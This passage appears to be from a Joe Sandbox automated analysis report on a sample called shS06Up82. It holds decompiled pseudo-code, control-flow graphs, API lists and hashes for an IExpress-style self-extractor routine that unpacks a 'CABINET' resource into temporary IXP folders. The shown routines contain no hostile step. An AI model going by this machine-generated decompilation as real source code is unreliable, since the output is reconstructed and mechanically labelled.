                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6228c6c3c04576f7fe0a5c896d0ebfcb5ca5917c6344a087f14117b8cdccfc49
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF7185B19006AD9FDB27DB61CCC5BFB77ADEB48344F1446A9F5059A1C0DA309E848B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 374 3e4fe0-3e501a call 3e468f FindResourceA LoadResource LockResource 377 3e5020-3e5027 374->377 378 3e5161-3e5163 374->378 379 3e5029-3e5051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->379 380 3e5057-3e505e call 3e4efd 377->380 379->380 383 3e507c-3e50b4 380->383 384 3e5060-3e5077 call 3e44b9 380->384 389 3e50e8-3e5104 call 3e44b9 383->389 390 3e50b6-3e50da 383->390 388 3e5107-3e510e 384->388 391 3e511d-3e511f 388->391 392 3e5110-3e5117 FreeResource 388->392 402 3e5106 389->402 401 3e50dc 390->401 390->402 394 3e513a-3e5141 391->394 395 3e5121-3e5127 391->395 392->391 399 3e515f 394->399 400 3e5143-3e514a 394->400 395->394 398 3e5129-3e5135 call 3e44b9 395->398 398->394 399->378 400->399 404 3e514c-3e5159 SendMessageA 400->404 405 3e50e3-3e50e6 401->405 402->388 404->399 405->389 405->402
                                                                                                                                                                                                      C-Code - Quality: 77%
                                                                                                                                                                                                      			E003E4FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				struct HWND__* _t9;
                                                                                                                                                                                                      				int _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				struct HWND__* _t24;
                                                                                                                                                                                                      				struct HWND__* _t27;
                                                                                                                                                                                                      				intOrPtr _t29;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				int _t34;
                                                                                                                                                                                                      				CHAR* _t36;
                                                                                                                                                                                                      				int _t37;
                                                                                                                                                                                                      				intOrPtr _t47;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t36 = "CABINET";
                                                                                                                                                                                                      				 *0x3e9144 = E003E468F(_t36, 0, 0);
                                                                                                                                                                                                      				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                      				 *0x3e9140 = _t8;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					return _t8;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t9 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      				if(_t9 != 0) {
                                                                                                                                                                                                      					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                      					ShowWindow(GetDlgItem( *0x3e8584, 0x841), 5);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t10 = E003E4EFD(0, 0);
                                                                                                                                                                                                      				if(_t10 != 0) {
                                                                                                                                                                                                      					__imp__#20(E003E4CA0, E003E4CC0, E003E4980, E003E4A50, E003E4AD0, E003E4B60, E003E4BC0, 1, 0x3e9148, _t33);
                                                                                                                                                                                                      					_t34 = _t10;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						L8:
                                                                                                                                                                                                      						_t29 =  *0x3e9148; // 0x0
                                                                                                                                                                                                      						_t24 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      						E003E44B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_t37 = 0;
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						goto L10;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#22(_t34, "*MEMCAB", 0x3e1140, 0, E003E4CD0, 0, 0x3e9140); // executed
                                                                                                                                                                                                      					_t37 = _t10;
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__#23(_t34); // executed
                                                                                                                                                                                                      					if(_t10 != 0) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L8;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      					E003E44B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					_t37 = 0;
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					_t12 =  *0x3e9140; // 0x0
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						FreeResource(_t12);
                                                                                                                                                                                                      						 *0x3e9140 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t37 == 0) {
                                                                                                                                                                                                      						_t47 =  *0x3e91d8; // 0x0
                                                                                                                                                                                                      						if(_t47 == 0) {
                                                                                                                                                                                                      							E003E44B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(( *0x3e8a38 & 0x00000001) == 0 && ( *0x3e9a34 & 0x00000001) == 0) {
                                                                                                                                                                                                      						SendMessageA( *0x3e8584, 0xfa1, _t37, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t37;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}
















                                                                                                                                                                                                      0x003e5135
                                                                                                                                                                                                      0x003e5135
                                                                                                                                                                                                      0x003e5127
                                                                                                                                                                                                      0x003e5141
                                                                                                                                                                                                      0x003e5159
                                                                                                                                                                                                      0x003e5159
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e515f

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 003E4FFE
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 003E5006
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 003E500D
                                                                                                                                                                                                      • GetDlgItem.USER32(00000000,00000842), ref: 003E5030
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 003E5037
                                                                                                                                                                                                      • GetDlgItem.USER32(00000841,00000005), ref: 003E504A
                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 003E5051
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 003E5111
                                                                                                                                                                                                      • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 003E5159
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                      • API String ID: 1305606123-2642027498
                                                                                                                                                                                                      • Opcode ID: c57979b0b994f8614a9cdd722a068737aa03955ed55fa7a9cfe7ebc762cd2588
                                                                                                                                                                                                      • Instruction ID: 085fc155c1c6a5119b4861e46c9a457e11bf00f553fbf1b54deffdafdc7483e7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c57979b0b994f8614a9cdd722a068737aa03955ed55fa7a9cfe7ebc762cd2588
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D23128B0B407E6BBDB335B63ADC9FA7369CA708759F050725F905AE2D1CAB49C008760
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      control_flow_graph 406 3e44b9-3e44f8 407 3e44fe-3e4525 LoadStringA 406->407 408 3e4679-3e467b 406->408 410 3e4527-3e452e call 3e681f 407->410 411 3e4562-3e4568 407->411 409 3e467c-3e468c call 3e6ce0 408->409 418 3e453f 410->418 419 3e4530-3e453d call 3e67c9 410->419 414 3e456b-3e4570 411->414 414->414 417 3e4572-3e457c 414->417 420 3e457e-3e4580 417->420 421 3e45c9-3e45cb 417->421 425 3e4544-3e4554 MessageBoxA 418->425 419->418 419->425 426 3e4583-3e4588 420->426 423 3e45cd-3e45cf 421->423 424 3e4607-3e4617 LocalAlloc 421->424 428 3e45d2-3e45d7 423->428 429 3e455a-3e455d 424->429 430 3e461d-3e4628 call 3e1680 424->430 425->429 426->426 431 3e458a-3e458c 426->431 428->428 432 3e45d9-3e45ed LocalAlloc 428->432 429->409 436 3e462d-3e463d MessageBeep call 3e681f 430->436 434 3e458f-3e4594 431->434 432->429 435 3e45f3-3e4605 call 3e171e 432->435 434->434 437 3e4596-3e45ad LocalAlloc 434->437 435->436 444 3e464e 436->444 445 3e463f-3e464c call 3e67c9 436->445 437->429 438 3e45af-3e45c7 call 3e171e 437->438 438->436 448 3e4653-3e4677 MessageBoxA LocalFree 444->448 445->444 445->448 448->409
                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E003E44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v64;
                                                                                                                                                                                                      				char _v576;
                                                                                                                                                                                                      				void* _v580;
                                                                                                                                                                                                      				struct HWND__* _v584;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t34;
                                                                                                                                                                                                      				void* _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                                                                      				signed int _t44;
                                                                                                                                                                                                      				signed int _t49;
                                                                                                                                                                                                      				signed int _t52;
                                                                                                                                                                                                      				void* _t54;
                                                                                                                                                                                                      				intOrPtr _t55;
                                                                                                                                                                                                      				intOrPtr _t58;
                                                                                                                                                                                                      				intOrPtr _t59;
                                                                                                                                                                                                      				int _t64;
                                                                                                                                                                                                      				void* _t66;
                                                                                                                                                                                                      				intOrPtr* _t67;
                                                                                                                                                                                                      				signed int _t69;
                                                                                                                                                                                                      				intOrPtr* _t73;
                                                                                                                                                                                                      				intOrPtr* _t76;
                                                                                                                                                                                                      				intOrPtr* _t77;
                                                                                                                                                                                                      				void* _t80;
                                                                                                                                                                                                      				void* _t81;
                                                                                                                                                                                                      				void* _t82;
                                                                                                                                                                                                      				intOrPtr* _t84;
                                                                                                                                                                                                      				void* _t85;
                                                                                                                                                                                                      				signed int _t89;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t75 = __edx;
                                                                                                                                                                                                      				_t34 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                      				_v584 = __ecx;
                                                                                                                                                                                                      				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                      				_t67 = _a4;
                                                                                                                                                                                                      				_t69 = 0xd;
                                                                                                                                                                                                      				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                      				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                      				_v580 = _t37;
                                                                                                                                                                                                      				asm("movsb");
                                                                                                                                                                                                      				if(( *0x3e8a38 & 0x00000001) != 0) {
                                                                                                                                                                                                      					_t39 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_v576 = 0;
                                                                                                                                                                                                      					LoadStringA( *0x3e9a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                      					if(_v576 != 0) {
                                                                                                                                                                                                      						_t73 =  &_v576;
                                                                                                                                                                                                      						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                      						_t75 = _t16;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t43 =  *_t73;
                                                                                                                                                                                                      							_t73 = _t73 + 1;
                                                                                                                                                                                                      						} while (_t43 != 0);
                                                                                                                                                                                                      						_t84 = _v580;
                                                                                                                                                                                                      						_t74 = _t73 - _t75;
                                                                                                                                                                                                      						if(_t84 == 0) {
                                                                                                                                                                                                      							if(_t67 == 0) {
                                                                                                                                                                                                      								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                      								_t83 = _t27;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t75 = _t83;
                                                                                                                                                                                                      									_t74 = _t80;
                                                                                                                                                                                                      									E003E1680(_t80, _t83,  &_v576);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t76 = _t67;
                                                                                                                                                                                                      								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                      								_t85 = _t24;
                                                                                                                                                                                                      								do {
                                                                                                                                                                                                      									_t55 =  *_t76;
                                                                                                                                                                                                      									_t76 = _t76 + 1;
                                                                                                                                                                                                      								} while (_t55 != 0);
                                                                                                                                                                                                      								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                      								_t83 = _t25 + _t74;
                                                                                                                                                                                                      								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                      								_t80 = _t44;
                                                                                                                                                                                                      								if(_t80 == 0) {
                                                                                                                                                                                                      									goto L6;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E003E171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t77 = _t67;
                                                                                                                                                                                                      							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                      							_t81 = _t18;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t58 =  *_t77;
                                                                                                                                                                                                      								_t77 = _t77 + 1;
                                                                                                                                                                                                      							} while (_t58 != 0);
                                                                                                                                                                                                      							_t75 = _t77 - _t81;
                                                                                                                                                                                                      							_t82 = _t84 + 1;
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t59 =  *_t84;
                                                                                                                                                                                                      								_t84 = _t84 + 1;
                                                                                                                                                                                                      							} while (_t59 != 0);
                                                                                                                                                                                                      							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                      							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                      							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                      							_t80 = _t44;
                                                                                                                                                                                                      							if(_t80 == 0) {
                                                                                                                                                                                                      								goto L6;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_push(_v580);
                                                                                                                                                                                                      								E003E171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                      								L23:
                                                                                                                                                                                                      								MessageBeep(_a12);
                                                                                                                                                                                                      								if(E003E681F(_t67) == 0) {
                                                                                                                                                                                                      									L25:
                                                                                                                                                                                                      									_t49 = 0x10000;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									_t54 = E003E67C9(_t74, _t74);
                                                                                                                                                                                                      									_t49 = 0x190000;
                                                                                                                                                                                                      									if(_t54 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t52 = MessageBoxA(_v584, _t80, "cent", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                      								_t83 = _t52;
                                                                                                                                                                                                      								LocalFree(_t80);
                                                                                                                                                                                                      								_t39 = _t52;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(E003E681F(_t67) == 0) {
                                                                                                                                                                                                      							L4:
                                                                                                                                                                                                      							_t64 = 0x10010;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t66 = E003E67C9(0, 0);
                                                                                                                                                                                                      							_t64 = 0x190010;
                                                                                                                                                                                                      							if(_t66 == 0) {
                                                                                                                                                                                                      								goto L4;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t44 = MessageBoxA(_v584,  &_v64, "cent", _t64);
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                      			}



































                                                                                                                                                                                                      0x003e462d
                                                                                                                                                                                                      0x003e4630
                                                                                                                                                                                                      0x003e463d
                                                                                                                                                                                                      0x003e464e
                                                                                                                                                                                                      0x003e464e
                                                                                                                                                                                                      0x003e463f
                                                                                                                                                                                                      0x003e4640
                                                                                                                                                                                                      0x003e4647
                                                                                                                                                                                                      0x003e464c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e464c
                                                                                                                                                                                                      0x003e4666
                                                                                                                                                                                                      0x003e466d
                                                                                                                                                                                                      0x003e466f
                                                                                                                                                                                                      0x003e4675
                                                                                                                                                                                                      0x003e4675
                                                                                                                                                                                                      0x003e45ad
                                                                                                                                                                                                      0x003e4527
                                                                                                                                                                                                      0x003e452e
                                                                                                                                                                                                      0x003e453f
                                                                                                                                                                                                      0x003e453f
                                                                                                                                                                                                      0x003e4530
                                                                                                                                                                                                      0x003e4531
                                                                                                                                                                                                      0x003e4538
                                                                                                                                                                                                      0x003e453d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e453d
                                                                                                                                                                                                      0x003e4554
                                                                                                                                                                                                      0x003e455a
                                                                                                                                                                                                      0x003e455a
                                                                                                                                                                                                      0x003e455a
                                                                                                                                                                                                      0x003e4525
                                                                                                                                                                                                      0x003e468c

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                      • MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 003E45A3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000065), ref: 003E45E3
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000002), ref: 003E460D
                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 003E4630
                                                                                                                                                                                                      • MessageBoxA.USER32(?,00000000,cent,00000000), ref: 003E4666
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 003E466F
                                                                                                                                                                                                        • Part of subcall function 003E681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 003E686E
                                                                                                                                                                                                        • Part of subcall function 003E681F: GetSystemMetrics.USER32(0000004A), ref: 003E68A7
                                                                                                                                                                                                        • Part of subcall function 003E681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 003E68CC
                                                                                                                                                                                                        • Part of subcall function 003E681F: RegQueryValueExA.ADVAPI32(?,003E1140,00000000,?,?,0000000C), ref: 003E68F4
                                                                                                                                                                                                        • Part of subcall function 003E681F: RegCloseKey.ADVAPI32(?), ref: 003E6902
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                      • String ID: LoadString() Error. Could not load string resource.$cent
                                                                                                                                                                                                      • API String ID: 3244514340-2605220145
                                                                                                                                                                                                      • Opcode ID: 844b3ced1195852392029cd994fad762035e0c8281333e5c05513c960c3345f9
                                                                                                                                                                                                      • Instruction ID: b9fefe75a985bde65f4cb6ec095c02f900fc4c9cda46442f03540f64be2dde18
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 844b3ced1195852392029cd994fad762035e0c8281333e5c05513c960c3345f9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D51E8719001A99BDF239F29CC48BAA7B69EF4A340F154795FD09AB2C1DB31DD05CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                                                                                      			E003E53A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				long _t13;
                                                                                                                                                                                                      				int _t14;
                                                                                                                                                                                                      				CHAR* _t20;
                                                                                                                                                                                                      				int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				CHAR* _t32;
                                                                                                                                                                                                      				signed int _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0x3e8004; // 0x59d037e4
                                                                                                                                                                                                      				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                      				_t32 = __edx;
                                                                                                                                                                                                      				_t20 = __ecx;
                                                                                                                                                                                                      				_t29 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					E003E171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                      					_t34 = _t34 + 0x10;
                                                                                                                                                                                                      					_t29 = _t29 + 1;
                                                                                                                                                                                                      					E003E1680(_t32, 0x104, _t20);
                                                                                                                                                                                                      					E003E658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                      					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                      					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                      					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(_t29 < 0x190) {
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L3:
                                                                                                                                                                                                      					_t30 = 0;
                                                                                                                                                                                                      					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                      						_t30 = 1;
                                                                                                                                                                                                      						DeleteFileA(_t32);
                                                                                                                                                                                                      						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return E003E6CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t30 = 1;
                                                                                                                                                                                                      				 *0x3e8a20 = 1;
                                                                                                                                                                                                      				goto L5;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 003E171E: _vsnprintf.MSVCRT ref: 003E1750
                                                                                                                                                                                                      • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E53FB
                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5402
                                                                                                                                                                                                      • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E541F
                                                                                                                                                                                                      • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E542B
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5434
                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 003E5452
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                      • API String ID: 1082909758-2310010875
                                                                                                                                                                                                      • Opcode ID: 394f549a41742a626ee61090cf377cd3725285a29719c3fe382df6958aaaab0a
                                                                                                                                                                                                      • Instruction ID: 78a333af42f872478b48822212549818144e577adb53772bea7051b4226d3ab0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 394f549a41742a626ee61090cf377cd3725285a29719c3fe382df6958aaaab0a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F61104717009A467D322AB279C89FEF366DEBD1725F000325F546DA1D0CE749D868AA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
